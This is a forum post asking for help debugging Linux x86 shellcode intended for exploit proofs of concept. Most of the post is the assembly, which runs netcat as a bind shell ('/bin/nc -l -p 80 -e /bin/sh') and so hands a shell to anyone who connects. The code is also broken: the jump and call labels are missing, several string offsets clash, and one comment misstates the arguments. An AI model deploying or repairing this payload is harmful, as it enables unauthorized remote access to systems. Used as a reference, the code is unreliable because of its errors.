Linux Intel Assembly for shellcode - Programmers Heaven

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!


Welcome to the new platform of Programmer's Heaven! We apologize for the inconvenience caused, if you visited us from a broken link of the previous version. The main reason to move to a new platform is to provide more effective and collaborative experience to you all. Please feel free to experience the new platform and use its exciting features. Contact us for any issue that you need to get clarified. We are more than happy to help you.

Linux Intel Assembly for shellcode

I am trying to learn how to write shellcode for my proof of concepts for exploits I find but I am not very good at assembly.
This is the code I was working on and for some reason it assembles fine but I think somewhere I might have made a mistake in some calculation for something? It basically launches Netcat like I asked it to but doesnt run the rest of the netcat command...

Section .text
global _start

jmp short b


pop esi
xor eax, eax
mov byte [esi + 7], al ; terminate /bin/nc
mov byte [esi + 10], al ; terminate -l
mov byte [esi + 13], al ; terminate -p
mov byte [esi + 17], al ; terminate 80
mov byte [esi + 20], al ; terminate -e
mov byte [esi + 27], al ; terminate /bin/sh
mov long [esi + 29], esi ; address of /bin/nc in AAAA
lea ebx, [esi + 8] ; get address of -l
mov long [esi + 33], ebx ; store address of -l in BBBB
lea ebx, [esi + 11] ; get address of -p
mov long [esi + 37], ebx ; store address of -p in CCCC
lea ebx, [esi + 14] ; get address of 80
mov long [esi + 41], ebx ; store address of 80 in DDDD
lea ebx, [esi + 17] ; get address of -e
mov long [esi + 45], ebx ; store address of -e in EEEE
lea ebx, [esi + 20] ; get address of /bin/sh
mov long [esi + 49], ebx ; Store address of /bin/sh in FFFF
mov long [esi + 53], eax ; put NULL in GGGG
mov byte al, 0x0b ; use execve
mov ebx, esi ; program
lea ecx, [esi + 29] ; argument array (/bin/sh -c /bin/ls)
lea edx, [esi + 53] ; NULL
int 0x80 ; call the kernel

call a
db '/bin/nc#-l#-p#80#-e#/bin/sh#AAAABBBBCCCCDDDDEEEEFFFFFGGGG'
Sign In or Register to comment.